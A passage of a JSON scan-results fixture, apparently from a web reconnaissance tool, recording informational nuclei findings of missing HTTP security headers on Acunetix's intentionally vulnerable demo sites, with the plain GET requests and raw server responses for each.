testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 NOT FOUND\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>404 Not Found</title>\n<h1>Not Found</h1>\n<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 528, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48' 'http://testhtml5.vulnweb.com/ajax/archive'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/ajax/archive", + "discovered_date": "2024-11-13T02:41:19.475Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /ajax/archive HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 2\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n[]", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 529, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203' 'http://testphp.vulnweb.com/CVS/Repository'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Repository", + "discovered_date": "2024-11-13T02:41:19.630Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Repository HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 8\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:56 GMT\r\nEtag: "4dca64a4-8"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\nacupart\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 530, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36' 'http://testhtml5.vulnweb.com/comment'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/comment", + "discovered_date": "2024-11-13T02:41:19.780Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /comment HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Sorry, but commenting is currently disabled! <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 531, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53' 'http://testhtml5.vulnweb.com/contact'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/contact", + "discovered_date": "2024-11-13T02:41:19.928Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /contact HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 532, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1' 'http://testhtml5.vulnweb.com/forgotpw'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/forgotpw", + "discovered_date": "2024-11-13T02:41:20.083Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /forgotpw HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 533, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at", + "discovered_date": "2024-11-13T02:41:20.226Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/libs/sessvars.js:105at HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 534, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32' 'http://testhtml5.vulnweb.com/static/app/partials'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/partials", + "discovered_date": "2024-11-13T02:41:20.374Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/partials HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:50 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 535, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36' 'http://testhtml5.vulnweb.com/samples'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/samples", + "discovered_date": "2024-11-13T02:41:20.512Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /samples HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n "http://www.w3.org/TR/html4/loose.dtd">\n<html>\n<head>\n <title>Python samples</title>\n</head>\n<body>\n <h3>Simple python programs:</h3>\n <ul>\n <li><a href="/getfile?fname=sample1.py">First sample</a></li>\n <li><a href="/getfile?fname=sample1.py">Second sample</a></li>\n </ul>\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 536, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49' 'http://testphp.vulnweb.com/CVS/Entries.Log'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Entries.Log", + "discovered_date": "2024-11-13T02:41:20.657Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Entries.Log HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 537, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102' 'http://testasp.vulnweb.com'", + "type": "http", + "http_url": "http://testasp.vulnweb.com", + "discovered_date": "2024-11-13T02:41:20.802Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3541\r\nCache-Control: private\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASPSESSIONIDSASBSTRC=LIKALMIBLAODJLDJGONMEJAO; path=/\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">\r\n<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->\r\n<head>\r\n<!-- InstanceBeginEditable name="doctitle" -->\r\n<title>acuforum forums</title>\r\n<!-- InstanceEndEditable -->\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">\r\n<!-- InstanceBeginEditable name="head" -->\r\n<!-- InstanceEndEditable -->\r\n<link href="styles.css" rel="stylesheet" type="text/css">\r\n</head>\r\n<body> \r\n<table width="100%" border="0" cellpadding="10" cellspacing="0"> \r\n <tr bgcolor="#008F00"> \r\n <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> \r\n <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> \r\n - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> \r\n\t- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>\r\n </div></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->\r\n\t<table width="100%" border="0" cellspacing="0" cellpadding="5">\r\n <tr>\r\n <td class="tableheader">Forum</td>\r\n <td class="tableheader">Threads</td>\r\n <td class="tableheader">Posts</td>\r\n <td class="tableheader">Last Post</td>\r\n </tr> \r\n\t<tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>11/13/2024 2:31:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr>\r\n\t</table><!-- InstanceEndEditable --></td> \r\n </tr> \r\n <tr align="right" bgcolor="#FFFFFF"> \r\n <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> \r\n </tr> \r\n</table> \r\n<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">\r\n\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>\r\n</div>\r\n</body>\r\n<!-- InstanceEnd --></html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 538, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0' 'http://testhtml5.vulnweb.com/report'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/report", + "discovered_date": "2024-11-13T02:41:20.945Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /report HTTP/1.1\r\nHost: 